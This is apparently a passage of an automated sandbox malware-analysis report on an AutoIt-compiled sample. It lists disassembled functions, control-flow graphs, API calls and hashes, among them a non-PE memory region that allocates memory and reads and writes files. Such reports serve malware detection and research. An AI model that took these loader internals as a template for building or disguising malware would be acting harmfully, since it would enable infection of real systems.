                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                        • String ID: #$0$AutoIt v3
                                                                        • API String ID: 423443420-4155596026
                                                                        • Opcode ID: f3b003059f0196dec74a2cfa6e97e19656f59560bae99f393034610aeb03c20c
                                                                        • Instruction ID: 65cf3e664630248443b7bc602fb99699f81f2fd6b2c3d661d623da57e27132df
                                                                        • Opcode Fuzzy Hash: f3b003059f0196dec74a2cfa6e97e19656f59560bae99f393034610aeb03c20c
                                                                        • Instruction Fuzzy Hash: CA213E70E28708AFDF11DFA5EC19B9D7BB0FB08712F014119E514A62A2D3B55540EF84
                                                                        Function 00893633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 767 893633-893681 769 8936e1-8936e3 767->769 770 893683-893686 767->770 769->770 771 8936e5 769->771 772 893688-89368f 770->772 773 8936e7 770->773 774 8936ca-8936d2 DefWindowProcW 771->774 777 89374b-893753 PostQuitMessage 772->777 778 893695-89369a 772->778 775 8cd0cc-8cd0fa call 8a1070 call 8a1093 773->775 776 8936ed-8936f0 773->776 780 8936d8-8936de 774->780 810 8cd0ff-8cd106 775->810 781 8936f2-8936f3 776->781 782 893715-89373c SetTimer RegisterWindowMessageW 776->782 779 893711-893713 777->779 784 8cd154-8cd168 call 8f2527 778->784 785 8936a0-8936a2 778->785 779->780 787 8936f9-89370c KillTimer call 89443a call 893114 781->787 788 8cd06f-8cd072 781->788 782->779 790 89373e-893749 CreatePopupMenu 782->790 784->779 804 8cd16e 784->804 791 8936a8-8936ad 785->791 792 893755-893764 call 8944a0 785->792 787->779 797 8cd0a8-8cd0c7 MoveWindow 788->797 798 8cd074-8cd076 788->798 790->779 793 8cd139-8cd140 791->793 794 8936b3-8936b8 791->794 792->779 793->774 809 8cd146-8cd14f call 8e7c36 793->809 802 8936be-8936c4 794->802 803 8cd124-8cd134 call 8f2d36 794->803 797->779 806 8cd078-8cd07b 798->806 807 8cd097-8cd0a3 SetFocus 798->807 802->774 802->810 803->779 804->774 806->802 811 8cd081-8cd092 call 8a1070 806->811 807->779 809->774 810->774 815 8cd10c-8cd11f call 89443a call 89434a 810->815 811->779 815->774
                                                                        APIs
                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 008936D2
                                                                        • KillTimer.USER32(?,00000001), ref: 008936FC
                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0089371F
                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0089372A
                                                                        • CreatePopupMenu.USER32 ref: 0089373E
                                                                        • PostQuitMessage.USER32(00000000), ref: 0089374D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                        • String ID: TaskbarCreated
                                                                        • API String ID: 129472671-2362178303
                                                                        • Opcode ID: 364ea3b8deca1f265f8beba1a27dcfee7a83952b07c0b5a429d8c1934da9b36e
                                                                        • Instruction ID: f71983b0aa1ed992f848837106f218f49002682f08259ec768a9306072eba51a
                                                                        • Opcode Fuzzy Hash: 364ea3b8deca1f265f8beba1a27dcfee7a83952b07c0b5a429d8c1934da9b36e
                                                                        • Instruction Fuzzy Hash: C241F8B2318B0DBBDF21BFA8DC19B7936A4F711301F180139F602D62A2D7719945B766
                                                                        Function 008C0637 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 194COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 824 8c0637-8c063a 825 8c063c-8c063f 824->825 826 8c065f-8c0664 824->826 828 8c0658-8c066b 825->828 829 8c0641-8c064c call 8b8b28 call 8b8db6 825->829 827 8c066e-8c067a 826->827 831 8c0847-8c0859 827->831 832 8c0680 827->832 828->827 841 8c0651-8c0653 829->841 831->829 842 8c085f-8c086f call 8c85a1 831->842 836 8c0687-8c0689 832->836 839 8c068f-8c0695 836->839 840 8c0796-8c079b 836->840 843 8c069b 839->843 844 8c0725-8c0728 839->844 840->831 845 8c07a1-8c07a4 840->845 846 8c089e-8c08a4 841->846 855 8c0874-8c0879 842->855 848 8c069d-8c06a0 843->848 849 8c0713-8c0717 843->849 850 8c077a-8c077f 844->850 851 8c072a-8c072d 844->851 852 8c07a9-8c07ac 845->852 859 8c06a6-8c06a9 848->859 860 8c0787-8c0790 848->860 857 8c0781-8c0783 849->857 858 8c0719-8c0723 849->858 856 8c0785 850->856 850->857 861 8c072f-8c0730 851->861 862 8c076a-8c0770 851->862 853 8c07ae-8c07c0 call 8b3662 852->853 854 8c07a6 852->854 853->829 878 8c07c6-8c07cc 853->878 854->852 855->841 865 8c087f-8c089b 855->865 856->860 857->860 858->860 866 8c06fd-8c0700 859->866 867 8c06ab-8c06ac 859->867 860->836 860->840 868 8c075d-8c075f 861->868 869 8c0732-8c0735 861->869 862->857 864 8c0772-8c0778 862->864 864->860 865->846 866->857 872 8c0702-8c0711 866->872 873 8c06ae-8c06b1 867->873 874 8c06f1-8c06f8 867->874 868->857 871 8c0761-8c0768 868->871 875 8c0737-8c073a 869->875 876 8c0750-8c0752 869->876 871->860 872->860 880 8c06e0-8c06e3 873->880 881 8c06b3-8c06b6 873->881 874->857 875->829 877 8c0740-8c0746 875->877 876->857 879 8c0754-8c075b 876->879 877->857 884 8c0748-8c074e 877->884 885 8c07d1-8c07d4 878->885 879->860 880->857 886 8c06e9-8c06ec 880->886 882 8c06b8-8c06bb 881->882 883 8c06d5-8c06db 881->883 882->829 887 8c06bd-8c06c0 882->887 883->860 884->860 888 8c07ce 885->888 889 8c07d6-8c07da 885->889 886->860 887->857 890 8c06c6-8c06d0 887->890 888->885 889->829 891 8c07e0-8c07e6 889->891 890->860 891->891 892 8c07e8-8c07fa call 8b37cb 891->892 895 8c07fc-8c0805 892->895 896 8c0807-8c0819 call 8b37cb 892->896 895->831 899 8c081b-8c0824 896->899 900 8c0826-8c0838 call 8b37cb 896->900 899->831 900->829 903 8c083e-8c0841 900->903 903->831
                                                                        APIs
                                                                        • __wcsnicmp.LIBCMT ref: 008C07F0
                                                                        • __wcsnicmp.LIBCMT ref: 008C080F
                                                                          • Part of subcall function 008B8B28: __getptd_noexit.LIBCMT ref: 008B8B28
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsnicmp$__getptd_noexit
                                                                        • String ID: P-}$UNICODE$UTF-16LE$UTF-8$ccs
                                                                        • API String ID: 78897640-3509635038
                                                                        • Opcode ID: 9b24bdd779b2a85b267ee1b779fc438c8a5f8adc0e73e1cd5b8d8d2682435141
                                                                        • Instruction ID: e07cfb474f8d7f8dd0ef2a5afb69b78046e45553b343545b7d740e40a3642bc2
                                                                        • Opcode Fuzzy Hash: 9b24bdd779b2a85b267ee1b779fc438c8a5f8adc0e73e1cd5b8d8d2682435141
                                                                        • Instruction Fuzzy Hash: 445159B1D04305D9EB384EA49C05F752674FB207C8F28813EEC4AE66C1E6B6DE90AE41
                                                                        Function 014FF328 Relevance: 10.7, APIs: 7, Instructions: 151fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 971 14ff328-14ff37a call 14ff228 CreateFileW 974 14ff37c-14ff37e 971->974 975 14ff383-14ff390 971->975 976 14ff4dc-14ff4e0 974->976 978 14ff3a3-14ff3ba VirtualAlloc 975->978 979 14ff392-14ff39e 975->979 980 14ff3bc-14ff3be 978->980 981 14ff3c3-14ff3e9 CreateFileW 978->981 979->976 980->976 983 14ff40d-14ff427 ReadFile 981->983 984 14ff3eb-14ff408 981->984 985 14ff44b-14ff44f 983->985 986 14ff429-14ff446 983->986 984->976 987 14ff451-14ff46e 985->987 988 14ff470-14ff487 WriteFile 985->988 986->976 987->976 990 14ff489-14ff4b0 988->990 991 14ff4b2-14ff4d7 CloseHandle VirtualFree 988->991 990->976 991->976
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 014FF36D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155642565.00000000014FE000.00000040.00000020.00020000.00000000.sdmp, Offset: 014FE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14fe000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                        • Instruction ID: 49d92ca1739000d36c1a794a43810f2bff482cc614a3e78f551fb81a940e01bb
                                                                        • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                        • Instruction Fuzzy Hash: BB51E776A50208FBEB20DFA4CC49FDE7778AF48701F108559F74AEA280DA7496458B64
                                                                        Function 008C80AB Relevance: 10.6, APIs: 7, Instructions: 62fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1011 8c80ab-8c80b9 1012 8c80ec-8c8111 GetLastError call 8b8b07 1011->1012 1013 8c80bb-8c80bf 1011->1013 1018 8c8112-8c8591 call 8b8b28 1012->1018 1013->1012 1014 8c80c1-8c80ea call 8c7cfd 1013->1014 1014->1012 1021 8c811e-8c8127 GetFileType 1014->1021 1023 8c8129-8c815c GetLastError call 8b8b07 CloseHandle 1021->1023 1023->1018 1027 8c815e-8c8169 call 8b8b28 1023->1027 1027->1018
                                                                        APIs
                                                                        • ___createFile.LIBCMT ref: 008C80DC
                                                                          • Part of subcall function 008C7CFD: ___crtIsPackagedApp.LIBCMT ref: 008C7D03
                                                                          • Part of subcall function 008C7CFD: GetModuleHandleW.KERNEL32(kernel32.dll,CreateFile2,00000001,?,?,?,00000000,00000109), ref: 008C7D16
                                                                          • Part of subcall function 008C7CFD: GetProcAddress.KERNEL32(00000000), ref: 008C7D1D
                                                                        • GetLastError.KERNEL32 ref: 008C8105
                                                                        • __dosmaperr.LIBCMT ref: 008C810C
                                                                        • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 008C811F
                                                                        • GetLastError.KERNEL32 ref: 008C8142
                                                                        • __dosmaperr.LIBCMT ref: 008C814B
                                                                        • CloseHandle.KERNEL32(?), ref: 008C8154
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorFileHandleLast__dosmaperr$AddressCloseModulePackagedProcType___create___crt
                                                                        • String ID:
                                                                        • API String ID: 569456945-0
                                                                        • Opcode ID: 1723897dfb46476a87085c98d2521bbcba1e8dc88e161d90011965be17fda887
                                                                        • Instruction ID: 907658bf117a35a47e5940f63c5eebfea28c7a46c40353514fc6bf75602b1094
                                                                        • Opcode Fuzzy Hash: 1723897dfb46476a87085c98d2521bbcba1e8dc88e161d90011965be17fda887
                                                                        • Instruction Fuzzy Hash: E111CD71A24609DBDB199F78DC19EAE7B74FB01364F18822CF821D72A1CB32C901EB00
                                                                        Function 008939D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1030 8939d5-893a45 CreateWindowExW * 2 ShowWindow * 2
                                                                        APIs
                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00893A03
                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00893A24
                                                                        • ShowWindow.USER32(00000000), ref: 00893A38
                                                                        • ShowWindow.USER32(00000000), ref: 00893A41
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CreateShow
                                                                        • String ID: AutoIt v3$edit
                                                                        • API String ID: 1584632944-3779509399
                                                                        • Opcode ID: 92812567c589608601c3c50385afb1df3b4df1ed9455daa1fc37c2a9fe58f99e
                                                                        • Instruction ID: 319c6c150b894f21243b45c40d11d71fe4e38016a8aa92783a0d47116903ae7b
                                                                        • Opcode Fuzzy Hash: 92812567c589608601c3c50385afb1df3b4df1ed9455daa1fc37c2a9fe58f99e
                                                                        • Instruction Fuzzy Hash: 7DF054706657947EEA316713AC2CE773E7DD7C6F51F01402DB914A21B1C1B11840EB70
                                                                        Function 0089407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1031 89407c-894092 1032 894098-8940ad call 897a16 1031->1032 1033 89416f-894173 1031->1033 1036 8cd3c8-8cd3d7 LoadStringW 1032->1036 1037 8940b3-8940d3 call 897bcc 1032->1037 1040 8cd3e2-8cd3fa call 897b2e call 896fe3 1036->1040 1037->1040 1041 8940d9-8940dd 1037->1041 1051 8940ed-89416a call 8b2de0 call 89454e call 8b2dbc Shell_NotifyIconW call 895904 1040->1051 1052 8cd400-8cd41e call 897cab call 896fe3 call 897cab 1040->1052 1043 8940e3-8940e8 call 897b2e 1041->1043 1044 894174-89417d call 898047 1041->1044 1043->1051 1044->1051 1051->1033 1052->1051
                                                                        APIs
                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 008CD3D7
                                                                          • Part of subcall function 00897BCC: _memmove.LIBCMT ref: 00897C06
                                                                        • _memset.LIBCMT ref: 008940FC
                                                                        • _wcscpy.LIBCMT ref: 00894150
                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00894160
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                        • String ID: Line:
                                                                        • API String ID: 3942752672-1585850449
                                                                        • Opcode ID: 383fc243f269e3afdf7889a7b2cd3c5e24a4bff4cfdcf2eb45cf030bcbcde068
                                                                        • Instruction ID: 5b7fdbd55fe0b33073514abe62c77703a4c699e65135d3c03410ac96a8a98bf5
                                                                        • Opcode Fuzzy Hash: 383fc243f269e3afdf7889a7b2cd3c5e24a4bff4cfdcf2eb45cf030bcbcde068
                                                                        • Instruction Fuzzy Hash: 9931CD31018704AADB21FB64DC46FDB77E8FB40314F18491AF595D20A2EB70A649CB83
                                                                        Function 008B541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1066 8b541d-8b5436 1067 8b5438-8b543d 1066->1067 1068 8b5453 1066->1068 1067->1068 1069 8b543f-8b5441 1067->1069 1070 8b5455-8b545b 1068->1070 1071 8b545c-8b5461 1069->1071 1072 8b5443-8b5448 call 8b8b28 1069->1072 1074 8b546f-8b5473 1071->1074 1075 8b5463-8b546d 1071->1075 1084 8b544e call 8b8db6 1072->1084 1078 8b5483-8b5485 1074->1078 1079 8b5475-8b5480 call 8b2de0 1074->1079 1075->1074 1077 8b5493-8b54a2 1075->1077 1082 8b54a9 1077->1082 1083 8b54a4-8b54a7 1077->1083 1078->1072 1081 8b5487-8b5491 1078->1081 1079->1078 1081->1072 1081->1077 1086 8b54ae-8b54b3 1082->1086 1083->1086 1084->1068 1088 8b54b9-8b54c0 1086->1088 1089 8b559c-8b559f 1086->1089 1090 8b54c2-8b54ca 1088->1090 1091 8b5501-8b5503 1088->1091 1089->1070 1090->1091 1094 8b54cc 1090->1094 1092 8b556d-8b556e call 8c0ba7 1091->1092 1093 8b5505-8b5507 1091->1093 1101 8b5573-8b5577 1092->1101 1096 8b552b-8b5536 1093->1096 1097 8b5509-8b5511 1093->1097 1098 8b55ca 1094->1098 1099 8b54d2-8b54d4 1094->1099 1104 8b553a-8b553d 1096->1104 1105 8b5538 1096->1105 1102 8b5513-8b551f 1097->1102 1103 8b5521-8b5525 1097->1103 1100 8b55ce-8b55d7 1098->1100 1106 8b54db-8b54e0 1099->1106 1107 8b54d6-8b54d8 1099->1107 1100->1070 1101->1100 1108 8b5579-8b557e 1101->1108 1109 8b5527-8b5529 1102->1109 1103->1109 1110 8b553f-8b554b call 8b46e6 call 8c0e5b 1104->1110 1111 8b55a4-8b55a8 1104->1111 1105->1104 1106->1111 1112 8b54e6-8b54ff call 8c0cc8 1106->1112 1107->1106 1108->1111 1113 8b5580-8b5591 1108->1113 1109->1104 1127 8b5550-8b5555 1110->1127 1114 8b55ba-8b55c5 call 8b8b28 1111->1114 1115 8b55aa-8b55b7 call 8b2de0 1111->1115 1123 8b5562-8b556b 1112->1123 1119 8b5594-8b5596 1113->1119 1114->1084 1115->1114 1119->1088 1119->1089 1123->1119 1128 8b555b-8b555e 1127->1128 1129 8b55dc-8b55e0 1127->1129 1128->1098 1130 8b5560 1128->1130 1129->1100 1130->1123
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                        • String ID:
                                                                        • API String ID: 1559183368-0
                                                                        • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                        • Instruction ID: e50612f99ea414bf4303ad1dbd5fcbc877ff6abe4493e1479e09c21896cf62f6
                                                                        • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                        • Instruction Fuzzy Hash: F1518070A00B09DBDB349EA9D8807EE77A6FF40326F248729F825D63D1D7719E908B45
                                                                        Function 0089686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _free.LIBCMT ref: 008CE263
                                                                        • _free.LIBCMT ref: 008CE2AA
                                                                          • Part of subcall function 00896A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00896BAD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _free$CurrentDirectory
                                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                        • API String ID: 3924578-1757145024
                                                                        • Opcode ID: 21a2349f180949d5276d17884824fff5f893546ccfb6d627fed2345dd280e38d
                                                                        • Instruction ID: d0e542ab6dc756bb5a4b98be5ac998fc1fce1c14a3c8c533f03c4e8bdb2e4340
                                                                        • Opcode Fuzzy Hash: 21a2349f180949d5276d17884824fff5f893546ccfb6d627fed2345dd280e38d
                                                                        • Instruction Fuzzy Hash: 24915B7191421DAFCF04EFA8C891AEEB7B8FF05314B14442AF816EB2A1DB70A955CB51
                                                                        Function 01500DC8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 145fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 01500CB8: Sleep.KERNELBASE(000001F4), ref: 01500CC9
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01500ED4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155642565.00000000014FE000.00000040.00000020.00020000.00000000.sdmp, Offset: 014FE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14fe000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFileSleep
                                                                        • String ID: H2U1C2JM9WM3N
                                                                        • API String ID: 2694422964-182228512
                                                                        • Opcode ID: 8709715334f97fda753b48465264202b7bc7c40cc922e505c9736c5c0a0d5ea9
                                                                        • Instruction ID: 8607dd95e95cc11f8fad1343c942c1cfe92ffbf02d29d0cbb138e86d3ea2bc30
                                                                        • Opcode Fuzzy Hash: 8709715334f97fda753b48465264202b7bc7c40cc922e505c9736c5c0a0d5ea9
                                                                        • Instruction Fuzzy Hash: A1519031D04259DBEF11DBE4C814BEEBB79BF54300F004599E618BB2C0DAB91B49CBA5
                                                                        Function 008935B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,008935A1,SwapMouseButtons,00000004,?), ref: 008935D4
                                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,008935A1,SwapMouseButtons,00000004,?,?,?,?,00892754), ref: 008935F5
                                                                        • RegCloseKey.KERNELBASE(00000000,?,?,008935A1,SwapMouseButtons,00000004,?,?,?,?,00892754), ref: 00893617
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID: Control Panel\Mouse
                                                                        • API String ID: 3677997916-824357125
                                                                        • Opcode ID: 68ced722cc2855472c22da6d2b73bd5ed60bea3d7c9e3c12ec7dfe9096257f3b
                                                                        • Instruction ID: b3c86c9f377ccf7a7bdcc9c41e16dc6b3fe20d5e7d1613b9604c7001a14a3fb4
                                                                        • Opcode Fuzzy Hash: 68ced722cc2855472c22da6d2b73bd5ed60bea3d7c9e3c12ec7dfe9096257f3b
                                                                        • Instruction Fuzzy Hash: 1C114871614208BFDF22DFA8DC409EEBBB8FF15744F048469E805E7210D2719F40A760
                                                                        Function 00897285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 008CEA39
                                                                        • GetOpenFileNameW.COMDLG32(?), ref: 008CEA83
                                                                          • Part of subcall function 00894750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00894743,?,?,?,0089715A,?,?,?,?,0089108C), ref: 00894770
                                                                          • Part of subcall function 008B0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008B07B0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
